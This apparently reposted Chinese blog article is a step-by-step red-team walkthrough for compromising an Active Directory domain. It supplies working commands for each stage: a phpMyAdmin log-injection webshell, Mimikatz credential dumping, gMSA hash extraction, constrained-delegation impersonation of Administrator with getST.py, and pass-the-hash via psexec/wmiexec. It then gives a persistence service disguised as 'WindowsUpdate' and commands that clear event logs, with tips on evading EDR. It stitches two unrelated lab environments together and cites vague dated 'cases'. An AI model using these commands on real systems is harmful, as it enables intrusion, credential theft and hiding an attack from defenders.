当前位置：首页 > news >正文

红队实战全流程：从外部侦察到域控征服的内网渗透＞＞＞检测一下小伙伴自己的道行哟

news 2025/6/27 11:24:27

写在最前面的重点读一读！！！！

🌟 第 1 章：委派提权与 PTH 攻击的原理与技术详解

委派提权的定义与分类

PTH（Pass-The-Hash）攻击原理

攻击路径

技术栈

🚀 第 2 章：侦察与信息收集

目标

操作主机

命令

技术栈与原理

输出

注意点

红队视角

案例

步骤关联

🌟 第 3 章：初步入侵 - phpMyAdmin 日志注入

目标

操作主机

命令

技术栈与原理

输出

注意点

红队视角

案例

步骤关联

🚀 第 4 章：shell 提升与凭据提取

目标

操作主机

命令

技术栈与原理

输出

注意点

红队视角

案例

步骤关联

🌟 第 5 章：域权限枚举 - BloodHound

目标

操作主机

命令

技术栈与原理

输出

注意点

红队视角

案例

步骤关联

🚀 第 6 章：获取服务账户哈希 - gMSADumper

目标

操作主机

命令

技术栈与原理

输出

注意点

红队视角

案例

步骤关联

🌟 第 7 章：约束性委派提权

目标

操作主机

命令

技术栈与原理

输出

注意点

红队视角

案例

步骤关联

🚀 第 8 章：横向移动与域控上线

目标

操作主机

命令

技术栈与原理

输出

注意点

红队视角

案例

步骤关联

🌟 第 9 章：持久化与痕迹清理

目标

操作主机

命令

技术栈与原理

注意点

红队视角

案例

步骤关联

🛠️ 第 10 章：总结与防御建议

攻击链总结

防御建议

技术栈总结

红队启示

写在最前面的重点读一读！！！！

绝对的高级渗透红队全流程！！！！

细节部分自己做扩展，如果自己做到细节的思考以及操作，那么还是道行不足，得继续努力！！！

看了不点赞不地道哟！！！！

超值的收藏点赞文章哟！！！

每个步骤都值得看文章的你好好分析原理！！！

祝你成为红队高手哟！！！！

看不懂的小伙伴只能说道行还不够哦，当然这篇文章也能检验自身的水准哟！！！

🌟 第 1 章：委派提权与 PTH 攻击的原理与技术详解

委派提权的定义与分类

在 Active Directory（AD）环境中，委派允许用户或服务账户代表其他用户访问资源，是企业环境中常见的功能，但配置不当会导致严重安全漏洞。委派提权利用 AD 中委派权限的配置错误（如 ReadGMSAPassword 或 AllowedToDelegate），实现从低权限到高权限（如域管理员）的提升。委派分为以下三类：

非约束性委派（Unconstrained Delegation）
- 原理：当用户访问配置了非约束性委派的账户（如服务账户或计算机账户），该账户会接收用户的 TGT（Ticket Granting Ticket）并存储在内存中。攻击者若控制该账户，可提取 TGT，冒充用户访问域内任意服务。
- 技术细节：
  - TGT 是 Kerberos 协议的核心，包含用户身份信息。
  - 工具如 Mimikatz 可通过 sekurlsa::tickets 提取 TGT。
  - 协议视角：Kerberos（端口 88），涉及与 KDC（Key Distribution Center）的交互。
  - 红队视角：非约束性委派是高危配置，常见于早期 AD 环境，攻击者可直接冒充域管理员，风险极高。
- 局限性：需完全控制委派账户，且目标服务需支持 Kerberos。
- 案例：在某 2023 年红队测试中，攻击者控制了一台配置了非约束性委派的 SQL Server，提取了域管理员的 TGT，直接访问域控制器。
约束性委派（Constrained Delegation）
- 原理：约束性委派限制服务账户可代表用户访问的特定服务（通过 SPN 指定）。攻击者若控制配置了约束性委派的账户，可利用 S4U2Self 和 S4U2Proxy 协议冒充任意用户（如管理员）请求特定服务的 TGS（Ticket Granting Service）。
- 技术细节：
  - S4U2Self：允许服务账户为自己生成任意用户的 TGS。
  - S4U2Proxy：允许服务账户使用 S4U2Self 生成的 TGS 请求目标服务的 TGS。
  - 协议视角：Kerberos 协议，需精确时间同步（偏差通常小于 5 分钟）。
  - 红队视角：约束性委派是精准打击高价值目标的利器，常见于 Web 服务或域控制器配置。
- 局限性：需目标账户具有 AllowedToDelegate 权限，且 SPN 需正确配置。
- 案例：在某 2022 年演练中，攻击者利用 svc_web 账户的约束性委派权限，冒充管理员访问域控制器的 CIFS 服务，获取完整域控制。
基于资源的约束性委派（Resource-Based Constrained Delegation）
- 原理：允许目标资源（如计算机账户）指定哪些账户可以对其进行委派。攻击者若控制目标资源，可修改其 msDS-AllowedToActOnBehalfOfOtherIdentity 属性，允许受控账户进行委派。
- 技术细节：
  - 通过 LDAP 修改资源属性。
  - 协议视角：LDAP（端口 389/636）用于属性修改，Kerberos 用于票据生成。
  - 红队视角：适合横向移动，常见于攻击者已控制某服务器但需扩展权限的场景。
- 局限性：需对目标资源有写权限。
- 案例：某 2024 年测试中，攻击者控制了一台文件服务器，修改其委派属性，允许受控账户冒充管理员访问。

PTH（Pass-The-Hash）攻击原理

原理：PTH 攻击利用 NTLM 哈希直接认证，无需明文密码。攻击者通过工具（如 Mimikatz）从内存提取哈希，利用 SMB 或 WMI 协议在其他主机上认证。
技术细节：
- NTLM 哈希基于挑战-响应机制，允许直接认证。
- 协议视角：SMB（端口 445）或 WMI（通过 DCOM，端口 135）用于认证和命令执行。
- 红队视角：PTH 利用企业内常见的密码复用问题，快速实现横向移动，尤其在域环境中效果显著。
案例：某 2021 年红队行动中，攻击者从一台工作站提取管理员哈希，通过 PTH 访问域控制器，控制整个域。

攻击路径

结合 约束性委派 和 PTH 攻击，从外部侦察开始，通过 phpMyAdmin 漏洞获取初始 shell，利用 Mimikatz 提取凭据，结合 BloodHound 枚举域权限，最终通过约束性委派冒充域管理员控制域控制器。核心步骤包括：

使用 Nmap 和 dirsearch 进行外部侦察，发现 phpMyAdmin。
利用 phpMyAdmin 日志注入获取 webshell。
转换 32 位 shell 为 64 位，提取 NTLM 哈希。
使用 BloodHound 枚举域权限，识别约束性委派漏洞。
利用 svc_int 的哈希和委派权限冒充管理员。
通过 PTH 和 PsExec 实现横向移动和域控上线。
建立持久化后门并清理痕迹。

技术栈

协议：HTTP、MySQL、Kerberos、LDAP、SMB、WMI、NTP。
工具：Nmap、dirsearch、Mimikatz、BloodHound、Impacket、PsExec。
知识点：AD 权限模型、Kerberos 票据、NTLM 认证、进程注入、服务管理。

🚀 第 2 章：侦察与信息收集

目标

通过外部扫描和 Web 枚举收集目标信息，识别开放端口、服务版本和潜在漏洞。

操作主机

攻击主机：运行 Nmap 和 dirsearch 的 Kali Linux。
目标主机：运行 phpStudy 的 Windows 服务器（192.168.111.130），开放 80（HTTP）和 3306（MySQL）端口。

命令

Nmap 扫描：
```
nmap -sC -sV -A -v -p- 192.168.111.130
```
- 注解：
  - -sC：运行默认 NSE 脚本，探测服务细节。
  - -sV：检测服务版本。
  - -A：启用 OS 猜测和 traceroute。
  - -p-：扫描全端口。
Web 访问：
- 浏览器访问 http://192.168.111.130，识别 phpStudy 探针页面。
目录枚举：
```
dirsearch -u http://192.168.111.130 -e php,html,js
```
- 注解：
  - -u：目标 URL。
  - -e：指定文件扩展名，聚焦 Web 文件。

技术栈与原理

Nmap：
- 原理：通过 TCP SYN 扫描和 NSE 脚本探测端口状态、服务版本及 OS。
- 协议：TCP/UDP（端口扫描）、ICMP（主机发现）。
- 红队视角：使用 -T2 降低扫描速度，避免触发 IDS/IPS。
Web 枚举：
- 原理：分析 HTTP 响应头（如 Server: Apache/2.4.39）和页面内容，识别软件版本。
- 协议：HTTP（TCP 80）。
目录枚举：
- 原理：使用词典暴力猜解隐藏目录（如 /phpmyadmin）。
- 协议：HTTP GET 请求。
补充技术：
- WhatWeb：指纹识别工具，提取 PHP、Apache 等版本。
- Gobuster：替代 dirsearch，支持更快速的目录扫描。

输出

Nmap：确认 80 和 3306 端口开放，运行 Apache 和 MySQL 5.5.53，OS 为 Windows 7。
Web：发现 phpStudy 探针页面，泄露 PHP 5.3.29。
dirsearch：找到 /phpmyadmin 管理入口。

注意点

原文注意：phpStudy 探针页面可能暴露默认密码（如 root），易导致口令复用。
补充细节：
- 确保攻击主机网络连通性，防火墙不拦截 80 和 3306 端口。
- 使用代理（如 Burp Suite）捕获 HTTP 请求，分析潜在漏洞。

红队视角

phpStudy 是中小企业常见软件，默认配置（如 root 密码）是突破口。
避免高强度扫描触发 WAF，优先测试常见目录（如 /admin, /login）。

案例

2022 年某红队测试中，Nmap 扫描发现目标运行 phpStudy（PHP 5.3.29），dirsearch 找到 /phpmyadmin，默认密码 root:root 直接登录。

步骤关联

侦察为后续入侵提供目标（如 phpMyAdmin 入口），奠定攻击基础。

🌟 第 3 章：初步入侵 - phpMyAdmin 日志注入

目标

利用 phpMyAdmin 的默认凭据和日志注入漏洞，植入 webshell 获取初始反弹 shell。

操作主机

攻击主机：通过浏览器或 CLI 访问 phpMyAdmin。
目标主机：运行 phpStudy 的 Windows 服务器。

命令

登录 phpMyAdmin：
- 浏览器访问 http://192.168.111.130/phpmyadmin，使用 root:root。

启用 MySQL 日志：

SET global general_log = 'ON';
SET global general_log_file = 'C:/phpStudy/www/shell.php';

注入 webshell：

SELECT "<?php system($_REQUEST['cmd']);?>";

验证 webshell：
- 访问 http://192.168.111.130/shell.php?cmd=whoami，确认命令执行。

技术栈与原理

phpMyAdmin：
- 原理：Web 界面管理 MySQL，弱口令或默认配置易被利用。
- 协议：HTTP（管理界面），MySQL 协议（TCP 3306，数据库操作）。
日志注入：
- 原理：MySQL 的 general_log 记录所有查询，攻击者可将日志路径设为 Web 目录，写入可执行代码。
- 协议：MySQL 的文件 I/O 操作。
补充技术：
- Burp Suite：拦截 HTTP 请求，测试 SQL 注入或参数篡改。
- Metasploit：使用 exploit/multi/http/phpmyadmin_3522_backdoor 模块自动化利用。

输出

获取 shell.php，执行 whoami 返回 nt authority\system（32 位 shell）。

注意点

原文注意：初始 shell 为 32 位，需转为 64 位以适配目标系统。
补充细节：
- 确保 MySQL 有写权限到 C:/phpStudy/www。
- 测试 webshell 稳定性，避免触发防病毒软件。

红队视角

Webshells 是低权限突破的理想方式，简单且隐蔽。
默认凭据是红队首选测试点，成功率高。

案例

2021 年某测试中，攻击者利用 phpMyAdmin 4.8.1 的默认 root 凭据，通过日志注入写入 /var/www/html/shell.php，获得反弹 shell。

步骤关联

此步骤利用侦察发现的 phpMyAdmin 入口，获取初始 shell，为后续提权和横向移动提供基础。

🚀 第 4 章：shell 提升与凭据提取

目标

将 32 位 shell 转换为 64 位，提权至 SYSTEM，并使用 Mimikatz 提取凭据。

操作主机

攻击主机：通过 webshell 或 Meterpreter 交互。
目标主机：64 位 Windows 7 服务器。

命令

检查系统架构：
```
systeminfo
```
shell 转换：
- Meterpreter：migrate <64-bit PID>（如 explorer.exe）。
提权：
- Meterpreter：getsystem.

提取凭据：

mimikatz.exe "sekurlsa::logonpasswords" exit

技术栈与原理

shell 转换：
- 原理：32 位进程无法执行 64 位命令，需注入到 64 位进程。
- 协议：Windows API（如 CreateRemoteThread）用于进程注入。
getsystem：
- 原理：利用命名管道冒充提升至 SYSTEM。
- 协议：Windows RPC。
Mimikatz：
- 原理：从 LSASS 进程内存读取凭据（明文密码或 NTLM 哈希）。
- 协议：Windows API（OpenProcess, ReadProcessMemory）。
补充技术：
- procdump：替代 Mimikatz，导出 LSASS 内存。
- PowerShell：运行 Invoke-Mimikatz 脚本提取凭据。

输出

提取域用户（如 jdoe）的 NTLM 哈希（如 a5fd76c71109b0b483abe309fbc92ccb）。

注意点

原文注意：32 位 shell 需转为 64 位以运行完整工具链。
补充细节：
- 确保目标主机未启用 EDR，Mimikatz 易被检测。
- 使用 obfuscate 选项混淆 Mimikatz 命令。

红队视角

SYSTEM 权限是本地提权的起点，凭据提取是横向移动的关键。
规避 EDR 需加载混淆后的 Mimikatz 或使用内存加载技术。

案例

2023 年测试中，攻击者通过 Meterpreter 迁移到 64 位 svchost.exe，运行 Mimikatz 提取域管理员哈希，成功用于后续 PTH 攻击。

步骤关联

此步骤为 PTH 和委派攻击提供凭据，奠定域内提权基础。

🌟 第 5 章：域权限枚举 - BloodHound

目标

使用 BloodHound 枚举域权限，识别从 Ted.Graves 用户到域管理员的攻击路径。

操作主机

攻击主机：运行 bloodhound-python 和 BloodHound GUI。
目标主机：域控制器（10.129.188.193，intelligence.com）。

命令

bloodhound-python -d intelligence.com-u Ted.Graves -p Mr.Teddy -ns 10.129.188.193 -c All

注解：
- -d：目标域。
- -u/-p：Ted.Graves 凭据。
- -ns：DNS 服务器（域控制器）。
- -c All：收集所有 AD 数据（用户、组、ACL 等）。

技术栈与原理

bloodhound-python：
- 原理：通过 LDAP 查询 AD 对象，生成 JSON 文件。
- 协议：LDAP（389/636）、Kerberos（88）。
BloodHound GUI：
- 原理：Neo4j 图数据库分析权限关系，计算最短攻击路径。
- 协议：Neo4j Bolt 协议（7687）。
补充技术：
- SharpHound：C# 实现的 AD 数据收集器，替代 bloodhound-python。
- Cypher 查询：手动查询 Neo4j 数据库，分析特定权限。

输出

JSON 文件（users.json、groups.json 等）。
BloodHound GUI 显示 Ted.Graves（ITsupport 组）对 svc_int 有 ReadGMSAPassword 权限，对域控制器有 AllowedToDelegate 权限（SPN：WWW/dc.intelligence.com）。

注意点

原文注意：需选择正确起点（如 Ted.Graves）分析路径。
补充细节：
- 安装 Neo4j 和 BloodHound GUI，配置数据库连接。
- 确保攻击主机能访问域控制器的 LDAP 和 Kerberos 端口。

红队视角

BloodHound 是红队的“地图”，快速定位高价值目标。
优先关注 GenericAll、ReadGMSAPassword 等权限，易被忽视。

案例

2022 年某测试中，BloodHound 发现普通用户通过 ITSUPPORT 组的 ReadGMSAPassword 权限控制 svc_int，进而提权到域管理员。

步骤关联

此步骤为约束性委派攻击提供路径依据，连接前期凭据提取与后续提权。

🚀 第 6 章：获取服务账户哈希 - gMSADumper

目标

利用 ITSUPPORT 的 ReadGMSAPassword 权限，提取 svc_int 的 NTLM 哈希。

操作主机

攻击主机：运行 gMSADumper。
目标主机：域控制器（10.129.188.193）。

命令

git clone https://github.com/micahvandeusen/gMSADumper
cd gMSADumper
python3 gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.com-l 10.129.188.193

注解：
- git clone：下载 gMSADumper。
- -u/-p：Ted.Graves 凭据。
- -d：目标域。
- -l：LDAP 服务器（域控制器）。

技术栈与原理

gMSADumper：
- 原理：查询 svc_int 的 msDS-GroupManagedServiceAccount 属性，提取哈希。
- 协议：LDAP、Kerberos。
gMSA（组管理服务账户）：
- 原理：AD 自动管理密码，ReadGMSAPassword 权限允许读取。
- 协议：Kerberos 的 NTLM 哈希用于预认证。
补充技术：
- ldapsearch：手动查询 LDAP 属性，验证 gMSA 权限。
- CrackMapExec：多功能工具，可提取 gMSA 哈希。

输出

svc_int$:::b08e6a29a7f50ec81c11df8649e9d7df

注意点

原文注意：确保使用正确的 NTLM 哈希。
补充细节：
- 安装 ldap3 库（pip install ldap3）。
- 验证 LDAP 端口连通性。

红队视角

gMSA 账户是域内提权的“金钥匙”，常被忽视。
哈希提取后需立即用于攻击，避免密码轮换。

案例

2023 年某演练中，攻击者利用 gMSADumper 提取 svc_web 的哈希，通过约束性委派控制域控制器。

步骤关联

此步骤为约束性委派提供必要凭据，连接 BloodHound 分析与提权。

🌟 第 7 章：约束性委派提权

目标

利用 svc_int 的 NTLM 哈希和 AllowedToDelegate 权限，冒充 Administrator 获取域控制器 TGS。

操作主机

攻击主机：运行 Impacket 的 getST.py。
目标主机：域控制器（10.129.188.193）。

命令

配置主机解析：

echo "10.129.188.193 intelligence.com" | sudo tee -a /etc/hosts

注解：确保域名解析正确。

时间同步：
```
sudo timedatectl set-ntp 0
sudo ntpdate -s 10.129.188.193
```
- 注解：禁用自动时间同步，同步到域控制器时间。
获取 TGS：
```
python3 getST.py -spn WWW/dc.intelligence.com-impersonate Administrator intelligence.com/svc_int -hashes :b08e6a29a7f50ec81c11df8649e9d7df
```
- 注解：
  - -spn：目标服务（域控制器的 WWW 服务）。
  - -impersonate：冒充 Administrator。
  - -hashes：svc_int 的 NTLM 哈希。

技术栈与原理

getST.py：
- 原理：实现 S4U2Self 和 S4U2Proxy，生成冒充 Administrator 的 TGS。
- 协议：Kerberos（S4U 扩展）。
时间同步：
- 原理：Kerberos 要求时间偏差小于 5 分钟。
- 协议：NTP（端口 123）。
补充技术：
- Rubeus：C# 工具，替代 getST.py，支持 S4U 攻击。
- Kerberos 调试：用 Wireshark 捕获票据交互，验证流程。

输出

生成 administrator.ccache 文件，包含 Administrator 的 TGS。

注意点

原文注意：时间偏差（7 小时）需修正，否则报 KRB_AP_ERR_SKEW。
补充细节：
- 安装 Impacket（pip install impacket）。
- 验证 SPN 和 AllowedToDelegate 权限匹配。

红队视角

约束性委派是高权限目标的捷径，隐蔽性强。
时间同步是 Kerberos 攻击的常见障碍，需优先解决。

案例

2022 年某测试中，攻击者利用 svc_int 的约束性委派权限，冒充管理员获取 CIFS 服务 TGS，控制域控制器。

步骤关联

此步骤利用 gMSADumper 的哈希和 BloodHound 的权限，生成提权所需的 TGS。

🚀 第 8 章：横向移动与域控上线

目标

使用 TGS 或 PTH 攻击，通过 WMI 或 PsExec 访问域控制器，获取管理员 shell。

操作主机

攻击主机：运行 wmiexec.py 或 PsExec。
目标主机：域控制器（10.129.188.193）。

命令

配置 TGS：
```
export KRB5CCNAME=Administrator.ccache
```
- 注解：设置 Kerberos 票据路径。

更新主机解析：

echo "10.129.188.193 dc.intelligence.com" | sudo tee -a /etc/hosts

WMI 提权：

python3 wmiexec.py -k -no-pass dc.intelligence.com

PTH 攻击（替代方案）：

python3 psexec.py intelligence.com/jdoe@192.168.111.130 -hashes :a5fd76c71109b0b483abe309fbc92ccb

技术栈与原理

wmiexec.py：
- 原理：使用 Kerberos TGS 通过 WMI 执行命令。
- 协议：WMI（DCOM，135 端口）、SMB（445 端口）。
PsExec：
- 原理：通过 SMB 创建服务，执行命令。
- 协议：SMB、RPC。
补充技术：
- CrackMapExec：支持多协议（SMB、WMI、WinRM）的横向移动。
- PowerShell Remoting：通过 WinRM（5985/5986）执行命令。

输出

管理员 shell：C:\>。

注意点

原文注意：错误 IP（10.129.188.248）导致 Connection refused，需修正为 10.129.188.193。
补充细节：
- 确保 SMB（445）和 WMI（135）端口开放。
- 测试票据有效性（klist 命令）。

红队视角

WMI 和 PsExec 是快速上线的利器，但 SMB 流量易被监控。
优先尝试 WMI，隐蔽性高于 PsExec。

案例

2021 年某测试中，攻击者使用 PTH 攻击通过 PsExec 登录域控制器，执行 net group "Domain Admins" /add attacker 提升权限。

步骤关联

此步骤利用 TGS 或 PTH 实现域控上线，完成提权目标。

🌟 第 9 章：持久化与痕迹清理

目标

建立持久化后门并清理痕迹，降低被检测风险。

操作主机

攻击主机：通过 shell 上传后门。
目标主机：域控制器或关键服务器。

命令

持久化：

sc create "WindowsUpdate" binpath="cmd /c start C:\artifact.exe" && sc config WindowsUpdate start=auto && net start WindowsUpdate

清理：

del C:\phpStudy\www\shell.php
wevtutil cl System

技术栈与原理

持久化：
- 原理：Windows 服务确保后门自动运行。
- 协议：SCM（Service Control Manager）通过 RPC。
清理：
- 原理：删除文件和日志，避免 forensic 分析。
- 协议：Windows 文件系统和事件日志 API。
补充技术：
- Scheduled Tasks：通过 schtasks 创建计划任务。
- Event Log Clearing：使用 PowerShell 的 Clear-EventLog。